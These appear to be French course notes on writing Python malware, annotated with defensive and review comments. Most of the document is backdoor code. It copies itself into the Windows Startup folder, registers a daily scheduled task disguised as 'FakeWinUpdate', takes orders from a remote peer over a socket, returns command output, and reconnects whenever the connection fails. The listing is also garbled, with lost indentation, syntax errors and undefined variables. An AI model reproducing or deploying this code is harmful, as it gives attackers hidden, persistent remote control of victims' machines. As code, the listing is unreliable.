Cours 2 MW Python

Malware

II. Condition User\

 Établir des conditions :

# Cleans the `userprofile` string (assigned outside this snippet) by removing
# line-ending residue from it before it is used elsewhere.
# NOTE(review): indentation was lost in this transcription, so it cannot be
# told from here whether the three replace() calls sit inside the `else`
# branch or after the whole chain. Every visible branch body is `pass`.
if "User\n" in userprofile:
pass
elif "User\r" in userprofile:
pass
# "\s" is not a Python escape sequence: this literal is a backslash followed
# by the letter "s", not a whitespace character.
elif "User\s" in userprofile:
pass
else:
pass
# Strip newline and carriage-return characters from the value.
userprofile = userprofile.replace("\n","")
userprofile = userprofile.replace("\r", "")
# Same literal as above: removes the two-character sequence backslash + "s".
userprofile = userprofile.replace("\s", "")
 

III. argv

Utiliser argv

# Persistence step of the sample: builds a PowerShell command string from the
# running script's own path (argv[0]) and a Startup-folder path, passes it to
# powershell.exe, then sends that process's captured stdout over `sock`.
# `argv`, `userprofile`, `subprocess` and `sock` come from outside this snippet.
#
# Defensive note: placing a program in a user's Startup folder so that it runs
# at logon is the autostart technique catalogued as MITRE ATT&CK T1547.001.
# What this code leaves behind for a defender is a file-creation event in a
# Startup folder and a powershell.exe process whose parent is the Python
# interpreter (or the packaged executable) running this script.
#
# NOTE(review): kept verbatim; this fragment is a teaching excerpt and is not
# valid Python as transcribed.
loc = argv [0]
to_dir = r"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup".format(userprofile)
# Command text handed to PowerShell: a copy followed by a directory change.
env = 'cp"{0}""{1};cd"{1}"'.format(loc,to_dir)
# The assembled command is printed on the local console before it is run.
print("ENV:", env)
proc = subprocess.Popen(["powershell.exe",env]stdout=subprocess.PIPE,shell=True)
(out,err) = proc.communicate()
print("\n\n",out,err)
# The process output is stringified and sent to the remote peer.
sock.send(str(out).encode())

IV. Message d’erreur

Message d’erreur

        # Error-handling tail of one or more `try` statements whose opening is
        # not part of this snippet.
        # NOTE(review): this first handler is indented while the others are
        # not, so it may belong to an inner `try` - TODO confirm against the
        # full listing.
        except Exception as e:
# Formats the exception as "error:<text>", encodes it as UTF-8 and sends it to
# the remote peer over `sock`.
msg = "error:{}".format(e)
msg = bytes(msg, encoding="utf-8")
sock.send(msg)
# Each connection-level failure below prints a message locally and calls
# shell() again. shell() is defined elsewhere; presumably it is the routine
# that opens the connection - verify against the full listing.
#
# Defensive note: a retry-on-failure pattern like this shows up in network
# telemetry as repeated outbound connection attempts from one host to the same
# endpoint, including while that endpoint refuses or resets connections.
except ConnectionRefusedError as reror:
print("Connection refused, try again...")
shell()
except TimeoutError as timeout:
print("Time out, try again...")
shell()
except ConnectionResetError as hackerdidit:
print("Connection closed...")
shell()

 

V. Schedule

 Nous allons rajouter schedule dans les commandes et nous allons définir schedule :

Slider ==>

# schedule(): asks the remote peer over `sock` for a task name, an hour and a
# description, then assembles a PowerShell command string that would register
# a daily scheduled task whose action runs Powershell.exe with this script's
# path (argv[0]) as argument. The lines shown here only build the string;
# nothing in this block executes it.
# `sock` and `argv` come from outside this snippet.
#
# Defensive note: registering a scheduled task for re-execution is the
# persistence technique catalogued as MITRE ATT&CK T1053.005. Task creation is
# recorded as Windows Security event 4698 when the corresponding object-access
# auditing is enabled, and the Register-ScheduledTask call is visible in
# PowerShell script-block logging (event 4104). The example name in the prompt
# imitates a Windows update, so a task's name alone is not a reliable
# indicator; the task's action and the process that registered it are.
#
# NOTE(review): kept verbatim; indentation was lost in this transcription.
def schedule():
sock.send("Please follow the rules\n".encode())

# First prompt: task name, read as up to 1024 bytes and decoded as UTF-8.
question = f"\n\n[+] Pick taskname, no space,symbols,extensions. FakeWinUpdate\n\n>"
sock.send(question.encode())
taskname = sock.recv(1024).decode("utf-8")
taskname = taskname.replace("\n", "")

# Removes every listed character from the task name.
not_allowed_symbols = [",", ".", "-", ",", ":", "+", "_", "-", "*", "(", ")"]
for k in not_allowed_symbols:
if k in taskname:
taskname = taskname.replace(k, "")

# Second prompt: hour of day; only the newline is stripped from the answer.
questiontwo ="\n[+] When? (available from 1am to 11am); write the number, ex.9 ->sched for 9am\n>"
sock.send(questiontwo.encode())
whenSched = sock.recv(1024).decode("utf-8")
whenSched = whenSched.replace("\n", "")

# Third prompt: task description; only the newline is stripped from the answer.
questionthree = "\n[+] Enter description, no symbols,scpace. \n>"
sock.send(questionthree.encode())
taskdesc = sock.recv(1024).decode("utf-8")
taskdesc = taskdesc.replace("\n", "")

path_to_vir = argv[0]

# The three values received from the socket are interpolated directly into the
# PowerShell command text together with the script path.
command = "$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument'{0}';$trigger = " \
"New-ScheduledTaskTrigger -Daily -At{1}am;Register-ScheduledTask -Action $action -Trigger $trigger -" \
"TaskName'{2}' -Description'{3}'".format(path_to_vir, whenSched, taskname, taskdesc)

VI. Command execute/error

Cette partie vous informe si votre commande a été exécutée ou non :

# Execution and reporting step: passes the previously built `command` string
# to powershell.exe, then reports back to the remote peer over `sock`.
# `command`, `subprocess` and `sock` come from outside this snippet.
#
# Defensive note: the observable side of this step is a powershell.exe process
# spawned by the script's interpreter with the scheduled-task cmdlets on its
# command line, which process-creation logging with command-line capture
# records.
#
# NOTE(review): kept verbatim; indentation was lost in this transcription.
try:
workit = subprocess.Popen(["powershell.exe", command], stdout=subprocess.PIPE, shell=True)
(workit,errtwo) = workt.communicate()
sock.send(workittwo)

# The full command text is echoed back to the peer.
sock.send("command used:".encode())
sock.send(command.encode())

sock.send("Added to schedul".encode())
# Any exception raised in the block above, whatever its cause, results in the
# same failure message being sent.
except Exception as schedulererror:
sock.send("command not execute".encode())